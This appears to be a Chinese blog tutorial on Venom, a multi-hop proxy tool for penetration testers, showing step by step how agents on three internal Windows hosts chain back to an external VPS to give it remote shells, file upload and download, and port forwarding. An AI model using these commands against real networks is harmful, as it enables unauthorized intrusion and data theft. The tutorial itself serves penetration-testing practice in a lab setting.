内网穿透工具---Venom使用教程

介绍

从某个做内网工作的朋友口里面听到这个工具:Venom;这是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。这个工具在github上面链接;流弊呀~~~确实是很流弊的
这个工具直接下载编译好的比较方便啦;目录结构:
内网穿透工具---Venom使用教程_第1张图片
admin
内网穿透工具---Venom使用教程_第2张图片
agent
内网穿透工具---Venom使用教程_第3张图片
admin节点和agent节点均可监听连接也可发起连接

  1. admin监听端口,agent发起连接:
    admin.exe -lport 9999
    agent.exe -rhost 192.168.0.103 -rport 9999
  2. agent监听端口,admin发起连接:
    agent.exe -lport 8888
    admin.exe -rhost 192.168.204.139 -rport 8888

准备

1、外网的vps,Ubuntu:120.10.120.X(反正就是一个外网的IP)
2、内网的机器三台windowsIP地址192.168.3.160、192.168.3.15、192.168.3.30
3、设想外网的VPS要访问最里面的3.160只能一层一层的依次访问;3.160只能和3.30相互访问;3.30可以和3.15,3.160访问而不能访问外网的VPS;最后3.15能被外网VPS访问,也能和3.30相互访问;这时我们就是用神器Venom来进行一层一层的代理;(大家都知道同一个局域网的都可以相互访问,但是这只是设想了一个场景便于理解使用)
内网穿透工具---Venom使用教程_第4张图片

步骤

1、现将下载好的Venom工具依次上传到对应的机器里面,使用对应的执行文件进行运行,先在外网的VPS上面上传好工具包,解压并对对应的执行文件进行修改权限 chmod 777 admin_linux_x64;刚刚解压的时候都不能执行。
在这里插入图片描述
2、我这里使用./admin_linux_x64来进行监听本地端口操作,并让内网的机器连接外网的机器,内网的机器就是用agent.exe文件来进行连接操作吧。执行命令./admin_linux_x64 -lport 4343,监听本地4343端口。
内网穿透工具---Venom使用教程_第5张图片
3、这里所有机器都已经上传了Venom工具包并解压,环境都是windows的;接下来在192.168.3.15机器上面执行连接操作;执行命令agent.exe -rhost 120.10.120.X -rport 4343 ;
内网穿透工具---Venom使用教程_第6张图片
很快外网的VPS也监听成功了,获取了;
内网穿透工具---Venom使用教程_第7张图片
4、然后来在外网的VPS上进行操作;help,这里我们要使用到show,goto,listen,exit,shell这几个命令;先来看看怎么使用,余下的命令自己都可以摸索出来的;
内网穿透工具---Venom使用教程_第8张图片
这里执行show命令,可以看见刚刚进行连接的一个节点;
内网穿透工具---Venom使用教程_第9张图片
好勒,再来试试goto命令 这样可以切换到1节点上面去;
内网穿透工具---Venom使用教程_第10张图片
嘿,还是很简单的,接下里看看是否真的切换到192.168.3.15机器上面了,执行shell;就是192.168.3.15;这说明成功了;
内网穿透工具---Venom使用教程_第11张图片
5、接下来exit退出,进行下一步的监听操作;在不退出1节点的基础上面执行listen 4343端口进行监听;192.168.3.15机器上面已经监听成功了;
内网穿透工具---Venom使用教程_第12张图片
6、接着在192.168.3.30机器上面执行连接操作,执行命令:agent.exe -rhost 192.168.
3.15 -rport 4343,执行成功了;
内网穿透工具---Venom使用教程_第13张图片
再回到VPS上面进行查看一下,执行show命令,是否新增了一个节点;新增了一个节点;Venom工具在执行过程中尽量不要将命令写错,这个没有办法删除错误的命令 ;只能enter了
内网穿透工具---Venom使用教程_第14张图片
切换到节点2中;执行命令:goto 2;切换成功了后ipconfig查看IP,192.168.3.30这就是了,没有问题了;
内网穿透工具---Venom使用教程_第15张图片
7、现在进行最后一台机器;依次执行命令exit,listen 4343 ;192.168.3.30机器上面已经监听成功了
内网穿透工具---Venom使用教程_第16张图片
8、最后在192.168.3.160机器上面进行连接操作,执行命令:agent.exe -rhost 192.168.3.30 -rport 4343
内网穿透工具---Venom使用教程_第17张图片
9、最后回到VPS上面执行show查看一下成功没有;
内网穿透工具---Venom使用教程_第18张图片
依次执行命令:goto 3切换到3节点,shell,ipconfig,whoami;可以看到最后成功连接了3.160机器,这个过程就成功了
内网穿透工具---Venom使用教程_第19张图片
最后以上监听的端口在节点上面进行listen的时候可以不一致,一台机器上也可以监听多个端口,比如,内网2中有一台机器192.168.3.31,可以和3.30相互访问;
内网穿透工具---Venom使用教程_第20张图片
在节点2基础上面执行3.30本地监听;listen 11111 这里就是不是4343端口了,一样的可以监听成功。
内网穿透工具---Venom使用教程_第21张图片
在192.168.3.31上面执行命令:agent.exe -rhost 192.168.3.30 -rport 11111
在这里插入图片描述
再回到VPS上面执行show,可以看到新增一个节点4,这个就是192.168.3.31的机器了。
内网穿透工具---Venom使用教程_第22张图片
内网穿透工具---Venom使用教程_第23张图片
还可以本地文件上传于下载;
上传一直图片试试;upload 2018.jpg C:\2018.jpg 将本地的文件上传到节点1的C盘根目录下面
在这里插入图片描述
下载文件download C:\1.gif 1.gif 将节点1中的文件下载到本地
在这里插入图片描述

lforward/rforward 将本地端口转发到远程/将远程端口转发到本地
lforward将admin节点本地的8888端口转发到node1的8888端口
lforward 127.0.0.1 8888 8888

rforward 将node1网段的192.168.204.103端口8889转发到admin节点本地的8889端口
rforward 192.168.3.15 8088 8889
在这里插入图片描述
内网穿透工具---Venom使用教程_第24张图片
最后更多的命令之类的可以访问链接1链接2。

你可能感兴趣的:(内网渗透,安全,服务器)